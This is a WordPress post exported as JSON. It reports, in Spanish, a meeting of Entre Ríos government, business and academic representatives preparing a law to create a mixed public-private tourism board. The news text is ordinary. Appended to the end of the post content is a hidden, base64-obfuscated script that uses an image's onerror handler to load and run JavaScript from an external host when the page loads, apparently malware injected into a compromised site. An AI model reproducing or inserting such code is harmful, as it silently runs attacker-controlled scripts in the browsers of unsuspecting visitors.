{"id":8918,"date":"2024-11-13T09:04:20","date_gmt":"2024-11-13T12:04:20","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8918"},"modified":"2025-08-13T15:36:01","modified_gmt":"2025-08-13T18:36:01","slug":"entre-rios-asume-la-gobernanza-turistica-con-el-esquema-de-ente-mixto","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8918","title":{"rendered":"Entre R\u00edos asume la gobernanza tur\u00edstica con el esquema de Ente Mixto"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a120152eea13af96abf02561cc0ff753\" style=\"background-color:#144833\"><em>El sector p\u00fablico, privado y profesional del turismo entrerriano tuvo este mi\u00e9rcoles la segunda reuni\u00f3n preparatoria, previa a la creaci\u00f3n por ley del Ente Mixto de Turismo. Comunicaci\u00f3n, horizontalidad en la toma de decisiones y acciones conjuntas marcaron el orden del d\u00eda.<\/em><\/h4>\n\n\n\n<p>La Secretar\u00eda de Turismo de Entre R\u00edos volvi\u00f3 a convocar este mi\u00e9rcoles a las \u00e1reas gubernamentales, los organismos privados y los referentes de la academia que integrar\u00e1n el Directorio del Ente Mixto de Turismo de Entre R\u00edos (EMTURER), para dar continuidad a las reuniones preliminares que comenzaron el 27 de agosto en el Parque Nacional El Palmar.<\/p>\n\n\n\n<p>\u201cEl motivo de la convocatoria es la segunda reuni\u00f3n previa a la sanci\u00f3n de la ley de creaci\u00f3n de este ente, una mec\u00e1nica que nos propusimos para tener la gimnasia del funcionamiento, conocernos, empezar a articular, a horizontalizar las decisiones, compartir las opiniones y tener una mirada m\u00e1s comprensiva de la realidad. La b\u00fasqueda de este organismo es la construcci\u00f3n de consensos previos a la toma de decisiones. Hay un objetivo, una raz\u00f3n de ser para estas preliminares que tiene que ver con lo que se llama gobernanza\u201d, introdujo en su presentaci\u00f3n el secretario de Turismo, Jorge Satto.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8920\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-1024x683.jpg\" alt=\"\" class=\"wp-image-8920\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/aa18eeb49840cc82b25e973df9e9966e.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8919\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-1024x683.jpg\" alt=\"\" class=\"wp-image-8919\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/b2e4e897cce84e3752c4d0747ea2cca2.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8921\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-1024x683.jpg\" alt=\"\" class=\"wp-image-8921\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/270c2ae96c3792717e71159becea1e29.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>El encuentro tuvo lugar en el Centro Provincial de Convenciones de Paran\u00e1 (CPC) y cont\u00f3 con la participaci\u00f3n espont\u00e1nea del gobernador Rogelio Frigerio, quien inst\u00f3 a los referentes del sector privado y profesional \u201ca decir todo, lo que sienten, lo que creen, sin censura\u201d. \u201cDe la comunicaci\u00f3n real, de la generaci\u00f3n de confianza surge la posibilidad de corregir cosas que venimos haciendo mal desde hace much\u00edsimos a\u00f1os y que han significado una traba para el desarrollo del turismo en la provincia y, por la importancia del sector, tambi\u00e9n del desarrollo econ\u00f3mico y social de Entre R\u00edos\u201d, sostuvo y concluy\u00f3: \u201cEstamos haciendo algo fundacional para el turismo entrerriano\u201d.<\/p>\n\n\n\n<p>El temario del d\u00eda incluy\u00f3 el an\u00e1lisis de una de las primeras acciones concretas conjuntas que se desarrollaron como lo fue la representaci\u00f3n de Entre R\u00edos en la Feria Internacional de Turismo (FIT) de Am\u00e9rica Latina, donde privados y profesionales por primera vez tuvieron su lugar en el stand de la provincia con resultados que describieron como altamente positivos. Tambi\u00e9n se present\u00f3 el calendario de eventos, acciones y ferias para el \u00faltimo bimestre del a\u00f1o y se brindaron detalles sobre la planificaci\u00f3n del lanzamiento de la temporada de verano 2025 en Entre R\u00edos. Otro de los puntos destacados fueron la actualizaci\u00f3n de la normativa para la declaraci\u00f3n de inter\u00e9s y el car\u00e1cter provincial de las fiestas populares, as\u00ed como la necesidad de avanzar con decisiones firmes en la promoci\u00f3n del trabajo formal y la calidad de los servicios tur\u00edsticos.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8922\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-1024x683.jpg\" alt=\"\" class=\"wp-image-8922\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/8f85e05709487375bd4692cfabd0bc1f.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8923\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-1024x683.jpg\" alt=\"\" class=\"wp-image-8923\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/a4e646b08dbdaa1e981c50db90770886.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>La mesa fue presidida por Satto y el director General de la Secretar\u00eda de Turismo de Entre R\u00edos, Sebasti\u00e1n Bel. Ocuparon sus lugares el coordinador de Mipyme del Ministerio de Desarrollo Econ\u00f3mico, Leonardo Walter; la secretaria de Hacienda, Mariela Volpe; la secretaria de Planeamiento Territorial e Inversi\u00f3n P\u00fablica, Lelia Recalde; el secretario de Deportes, Sebasti\u00e1n Uranga; la prosecretaria de la C\u00e1mara de Senadores, Sara Foletto; y el presidente de la Comisi\u00f3n de Cultura y Turismo de la C\u00e1mara de Diputados, Mauro Godein, por el sector p\u00fablico. La academia estuvo representada por el vicerrector de la Universidad Aut\u00f3noma de Entre R\u00edos (UADER), Rom\u00e1n Scattini. Y el sector privado y profesional se hizo presente a trav\u00e9s del presidente de la C\u00e1mara Entrerriana de Turismo (CET), Juan Acedo; el vicepresidente de la Federaci\u00f3n Econ\u00f3mica de Entre R\u00edos (FEDER), Daniel Rinaldi; el presidente de la Asociaci\u00f3n Santafesina y Entrerriana de Agentes de Viajes y Turismo (ASEAVyt), Oscar Bassa; el coordinador de la Seccional Paran\u00e1 de la Uni\u00f3n de Trabajadores Hoteleros y Gastron\u00f3micos de la Rep\u00fablica Argentina (UTHGRA), Jos\u00e9 Trlin Carelli; y la presidente del Colegio de Profesionales de Turismo de Entre R\u00edos (COPROTUER), Lina Pereyra.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticia\/499\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-1.jpeg\" alt=\"\" class=\"wp-image-8904\" style=\"width:326px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El sector p\u00fablico, privado y profesional del turismo entrerriano tuvo este mi\u00e9rcoles la segunda reuni\u00f3n preparatoria, previa a la creaci\u00f3n por ley del Ente Mixto de Turismo. Comunicaci\u00f3n, horizontalidad en la toma de decisiones y acciones conjuntas marcaron el orden del d\u00eda. La Secretar\u00eda de Turismo de Entre R\u00edos volvi\u00f3 a convocar este mi\u00e9rcoles a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8923,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-8918","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8918","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8918"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8918\/revisions"}],"predecessor-version":[{"id":10043,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8918\/revisions\/10043"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8923"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}